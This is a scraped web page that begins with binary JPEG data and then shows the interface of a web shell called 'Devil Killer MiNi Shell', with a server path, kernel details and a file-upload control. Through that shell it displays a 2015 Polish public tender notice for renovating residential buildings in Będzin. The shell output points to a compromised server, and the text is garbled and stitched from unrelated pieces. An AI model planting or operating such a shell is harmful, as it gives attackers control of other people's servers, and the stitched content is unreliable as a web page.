JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150715/177724-N-2015.html

<p class="kh_header"><b>Będzin: Zadanie Nr 1: Renowacja i ocieplenie ścian oraz stropu nad przejazdem, wymiana stolarki, rozbiórka budynku gospodarczego - budynek mieszkalny przy ul. Joselewicza 8 w Będzinie. Zadanie Nr 2: Ocieplenie ścian budynku, remont dachów, remont budynków gospodarczych, remont balkonów oraz wymiana stolarki - budynek mieszkalny przy ul. Joselewicza 16 w Będzinie. Zadanie Nr 3: Renowacja, przebudowa i ocieplenie ścian zewnętrznych, remont balkonu i podestów, wymiana stolarki - budynek mieszkalny przy ul. Czeladzkiej 10 w Będzinie.</b><br>
<b>Numer ogłoszenia: 177724 - 2015; data zamieszczenia: 15.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Budynków Mieszkalnych sp. z o.o. , ul. Krakowska 16, 42-500 Będzin, woj. śląskie, tel. 32 7295221, 7295162, faks 32 7295774.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbm.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego ze 100% udziałem Adm. samorządowej. Zarządzanie na zlecenie..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie Nr 1: Renowacja i ocieplenie ścian oraz stropu nad przejazdem, wymiana stolarki, rozbiórka budynku gospodarczego - budynek mieszkalny przy ul. Joselewicza 8 w Będzinie. Zadanie Nr 2: Ocieplenie ścian budynku, remont dachów, remont budynków gospodarczych, remont balkonów oraz wymiana stolarki - budynek mieszkalny przy ul. Joselewicza 16 w Będzinie. Zadanie Nr 3: Renowacja, przebudowa i ocieplenie ścian zewnętrznych, remont balkonu i podestów, wymiana stolarki - budynek mieszkalny przy ul. Czeladzkiej 10 w Będzinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1: roboty przygotowawcze, polegające min. na  odbiciu tynku, naprawieniu uszkodzonych w murze cegieł i powierzchni murów,  przemurowaniu ciągłym pęknięć, skuciu gzymsów, cokołów,  parapetów i pozostałości obramowań okiennych na elewacji, uzupełnieniu tynku, wymianie obróbek, rynien i rur spustowych, demontażu konstrukcji wsporczych, rozbiórka budynku gospodarczego (komórki) mieszczącego się na placu, rozbiórka ściany zewnętrznej na placu przy przejeździe (pozostałość rozebranego budynku),
ocieplenie stropu nad przejazdem (sufit podwieszony  z izolacją termiczną w postaci mat z wełny mineralnej grub. 2x10cm, płyty gipsowe, tynk krzemianowo-silikonowy), przygotowanie podłoża, gruntowanie, wykonanie warstwy zbrojonej z siatki, wykonanie wyprawy elewacyjnej z tynku silikonowego, (elewacja wschodnia), przygotowanie podłoża, gruntowanie, ocieplenie styropianem grub. 12cm z wykonaniem wyprawy elewacyjnej z tynku silikonowego (elewacja północna,  elewacja zachodnia, elewacja wschodnia od podwórza, elewacja południowa),  dostawa i montaż profili elewacyjnych ze styropianu (gzymsy, obramowania okien), częściowa wymiana stolarki okiennej na stolarkę PCV i stolarki drzwiowej na  stalową, remont piwnic i klatki schodowej (roboty tynkarskie, malarskie, posadzkarskie, itp.), rozbiórka nawierzchni betonowej przejazdu i placu, wykonanie podbudowy i nawierzchni z kostki betonowej,
wywóz i utylizacja gruzu. Zadanie Nr 2: roboty przygotowawcze, polegające min. na  odbiciu tynku, naprawieniu uszkodzonych w murze cegieł i powierzchni murów, przemurowaniu ciągłym pęknięć, uzupełnieniu tynku, wymianie obróbek, rynien i rur spustowych, uzupełnieniu gzymsów, uzupełnieniu ścian, ocieplenie stropu nad przejazdem (izolacja termiczna w postaci mat z wełny mineralnej grub. 2x10cm, tynk krzemianowo-silikonowy), przygotowanie podłoża, gruntowanie, ocieplenie styropianem grub. 12cm z wykonaniem wyprawy elewacyjnej z tynku silikonowego na wszystkich elewacjach oraz wełną mineralną twardą grub. 12 cm na pasach kominowych (elewacja wschodnia) z wykonaniem wyprawy elewacyjnej z tynku krzemianowo-silikonowego, przygotowanie podłoża, gruntowanie, wykonanie warstwy zbrojonej z siatki, wykonanie wyprawy elewacyjnej z tynku silikonowego, (pomieszczenia gospodarcze),
częściowa wymiana stolarki okiennej na stolarkę PCV i stolarki drzwiowej na  stalową, wymiana balkonów na balkony systemowe, stalowe,  podwieszane - podest z płyty kompozytowej, barierka stalowa wys. min. 1,10m malowana proszkowo, naprawa dachów: oficyn budynku - krycie papą termozgrzewalną na istniejącym pokryciu, przybudówki - ocieplenie styropapą , krycie papą termozgrzewalną, budynków gospodarczych - rozbiórka pokrycia z papy i blachy trapezowej, wymiana deskowania dachu na deskowanie z płyt OSB grub. 22mm,  pokrycie papą termozgrzewalną, rozbiórka nawierzchni betonowej przejazdu,  placu i chodnika wzdłuż budynków gospodarczych, wykonanie podbudowy i nawierzchni z kostki betonowej, wywóz i utylizacja gruzu. Zadanie Nr 3: roboty przygotowawcze, polegające min. na odbiciu tynku, naprawieniu uszkodzonych w murze cegieł i powierzchni murów, przemurowaniu ciągłym pęknięć, uzupełnieniu tynku, wymianie obróbek blacharskich, rynien i rur spustowych, 
przygotowanie podłoża, gruntowanie, wykonanie warstwy zbrojonej z siatki, wykonanie wyprawy elewacyjnej z tynku silikonowego (elewacja południowa i zachodnia), przygotowanie podłoża, gruntowanie, ocieplenie styropianem grub. 12cm z wykonaniem wyprawy elewacyjnej z tynku silikonowego (elewacja północna, wschodnia, ściany atrium), częściowa wymiana stolarki okiennej na stolarkę PCV i stolarki drzwiowej na  stalową, wymiana balkonu na balkon systemowy, stalowy,  podwieszany - podest z płyty kompozytowej,
barierka stalowa wys. min. 1,10m malowana proszkowo, oraz podestu w atrium  na podest z płyty kompozytowej z barierką j.w., ocieplenie  ścian fundamentowych na głębokość 2,0m, styropianem FUNDAMENT grub. 12cm., 
z izolacją folią kubełkową, wykonanie opaski z białego żwiru (elewacja wschodnia i częściowo południowa), wywóz i utylizacja gruzu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.21.00-2, 45.42.10.00-4, 45.42.10.00-5, 45.44.30.00-4, 45.45.30.00-7, 45.11.13.00-1, 45.26.19.10-6, 45.23.32.00-1, 45.11.12.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do udziału w postępowaniu obowiązany jest wnieść wadium w wysokości: dla Zadania Nr 1 w kwocie  6 000,00 zł, (słownie złotych: sześć tysięcy 00/100), dla Zadania Nr 2 w kwocie  7 400,00 zł, (słownie złotych: siedem tysięcy czterysta 00/100), dla Zadania Nr 3 w kwocie  4 000,00 zł, (słownie złotych: cztery tysiące 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony, jeżeli Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr  5 do  SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony, jeżeli Wykonawca wykaże po dwie roboty budowlane dla każdego Zadania oddzielnie, każda o wartości brutto nie mniejszej niż  200 000,00 zł, o charakterze porównywalnym z przedmiotem niniejszego zamówienia, wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączy dowody najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Uwaga: W przypadku, gdy Wykonawca wykonywał wcześniej roboty budowlane o charakterze porównywalnym z przedmiotem niniejszego zamówienia na rzecz Zamawiającego, nie ma obowiązku przedkładania dowodów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony, jeżeli Wykonawca wykaże, że 1 osoba, która będzie uczestniczyć w wykonywaniu zamówienia, pełniąca obowiązki kierownika budowy, posiada niezbędne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, zgodne z obowiązującymi przepisami prawa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony, jeżeli  Wykonawca dołączy do oferty  kserokopię opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 200 000,00 złotych (słownie złotych: dwieście tysięcy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony czytelnie formularz oferty na druku lub wg druku - Załącznik nr 4 
do  SIWZ; 2. szczegółowy  kosztorys ofertowy dla Zadania Nr 1 i/lub Zadania Nr 2 i/lub Zadania Nr 3; 3. pełnomocnictwo, jeżeli uprawnienie do podpisania oferty nie wynika z rejestru lub ewidencji; 4. dowód wniesienia wadium: dla Zadania Nr 1 w kwocie  6 000,00 zł, (słownie złotych: sześć tysięcy 00/100),  dla Zadania Nr 2 w kwocie  7 400,00 zł, (słownie złotych: siedem tysięcy czterysta 00/100),
dla Zadania Nr 3 w kwocie  4 000,00 zł, (słownie złotych: cztery tysiące 00/100).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - termin płatności faktur - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian umowy w stosunku do treści oferty w zakresie: 1. terminu wykonania zamówienia, jeżeli dochowanie terminu zakończenia robót określonego w umowie jest niemożliwe z uwagi na:
1.1. okoliczności niezależne od Wykonawcy, lub których Wykonawca przy zachowaniu  należytej  staranności  nie  był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonywaniu robót spowodowane przez osoby trzecie, 1.2. konieczność wykonania robót zamiennych lub dodatkowych, których wykonanie stało się niezbędne do wykonania zamówienia. W takim przypadku Zamawiający przewiduje również możliwość zmiany 
wynagrodzenia Wykonawcy, przy czym wyliczenie należności za roboty zamienne lub dodatkowe nastąpi wg zasad określonych w § 3 ust 4 wzoru umowy - Załącznik nr 10  do SIWZ. 1.3. warunki atmosferyczne uniemożliwiające wykonanie robót - potwierdzone wpisem do dziennika budowy, 1.4.	wystąpienia okoliczności, których nie można było przewidzieć, pomimo zachowania należytej staranności, tj. przeszkód technicznych niezależnych od Wykonawcy, działania siły wyższej (np. pożaru, powodzi, gradobicia, strajku, itp.), przestojów i opóźnień zawinionych przez Zamawiającego. 2. wynagrodzenia brutto Wykonawcy w przypadku zmiany stawki VAT. Zmiana ta następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę VAT. Zmiana umowy będzie wymagała zachowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.bedzin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski zakład Budynków Mieszkalnych Sp. z o.o., 42-500 Będzin, ul. Krakowska 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2015 godzina 09:45, miejsce: Miejski zakład Budynków Mieszkalnych Sp. z o.o., 42-500 Będzin, ul. Krakowska 16, Sekretariat I piętro, pokój nr 16..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1	
Renowacja części elewacji wschodniej, południowej i północnej (brama), ocieplenie oraz przebudowa pozostałych ścian zewnętrznych budynku, ocieplenie stropu nad przejazdem, wymiana części stolarki zewnętrznej, rozbiórka budynku gospodarczego.
Lokalizacja: budynek mieszkalny przy ul. Joselewicza 8 w Będzinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> roboty przygotowawcze, polegające min. na  odbiciu tynku, naprawieniu uszkodzonych w murze cegieł i powierzchni murów,  przemurowaniu ciągłym pęknięć, skuciu gzymsów, cokołów,  parapetów i pozostałości obramowań okiennych na elewacji, uzupełnieniu tynku, wymianie obróbek, rynien i rur spustowych, demontażu konstrukcji wsporczych; rozbiórka budynku gospodarczego (komórki) mieszczącego się na placu, rozbiórka ściany zewnętrznej na placu przy przejeździe (pozostałość rozebranego budynku);
ocieplenie stropu nad przejazdem (sufit podwieszony  z izolacją termiczną w postaci mat z wełny mineralnej grub. 2x10cm, płyty gipsowe, tynk krzemianowo-silikonowy); przygotowanie podłoża, gruntowanie, wykonanie warstwy zbrojonej z siatki, wykonanie wyprawy elewacyjnej z tynku silikonowego, (elewacja wschodnia); przygotowanie podłoża, gruntowanie, ocieplenie styropianem grub. 12cm z wykonaniem wyprawy elewacyjnej z tynku silikonowego (elewacja północna,  elewacja zachodnia, elewacja wschodnia od podwórza, elewacja południowa),  dostawa i montaż profili elewacyjnych ze styropianu (gzymsy, obramowania okien); częściowa wymiana stolarki okiennej na stolarkę PCV i stolarki drzwiowej na  stalową; remont piwnic i klatki schodowej (roboty tynkarskie, malarskie, posadzkarskie, itp.); rozbiórka nawierzchni betonowej przejazdu i placu, wykonanie podbudowy i nawierzchni z kostki betonowej; wywóz i utylizacja gruzu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.21.00-2, 45.42.10.00-4, 45.42.10.00-5, 45.44.30.00-4, 45.45.30.00-7, 45.11.13.00-1, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności faktury - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2
Ocieplenie i przebudowa ścian zewnętrznych budynku frontowego i oficyn, remont dachów, remont i przebudowa budynków gospodarczych, remont balkonów oraz wymiana części stolarki zewnętrznej.
Lokalizacja: budynek mieszkalny przy ul. Joselewicza 16 w Będzinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> roboty przygotowawcze, polegające min. na  odbiciu tynku, naprawieniu uszkodzonych w murze cegieł i powierzchni murów, przemurowaniu ciągłym pęknięć, uzupełnieniu tynku, wymianie obróbek, rynien i rur spustowych, uzupełnieniu gzymsów, uzupełnieniu ścian; ocieplenie stropu nad przejazdem (izolacja termiczna w postaci mat z wełny mineralnej grub. 2x10cm, tynk krzemianowo-silikonowy); przygotowanie podłoża, gruntowanie, ocieplenie styropianem grub. 12cm z wykonaniem wyprawy elewacyjnej z tynku silikonowego na wszystkich elewacjach oraz wełną mineralną twardą grub. 12 cm na pasach kominowych (elewacja wschodnia) z wykonaniem wyprawy elewacyjnej z tynku krzemianowo-silikonowego; przygotowanie podłoża, gruntowanie, wykonanie warstwy zbrojonej z siatki, wykonanie wyprawy elewacyjnej z tynku silikonowego, (pomieszczenia gospodarcze); częściowa wymiana stolarki okiennej na stolarkę PCV i stolarki drzwiowej na  stalową; wymiana balkonów na balkony systemowe, stalowe,  podwieszane - podest z płyty kompozytowej,
barierka stalowa wys. min. 1,10m malowana proszkowo; naprawa dachów:
- oficyn budynku - krycie papą termozgrzewalną na istniejącym pokryciu,
- przybudówki - ocieplenie styropapą , krycie papą termozgrzewalną, 
- budynków gospodarczych - rozbiórka pokrycia z papy i blachy trapezowej, wymiana deskowania dachu na deskowanie z płyt OSB grub. 22mm,  pokrycie papą termozgrzewalną; rozbiórka nawierzchni betonowej przejazdu,  placu i chodnika wzdłuż budynków gospodarczych, wykonanie podbudowy i nawierzchni z kostki betonowej; wywóz i utylizacja gruzu..</p></li>
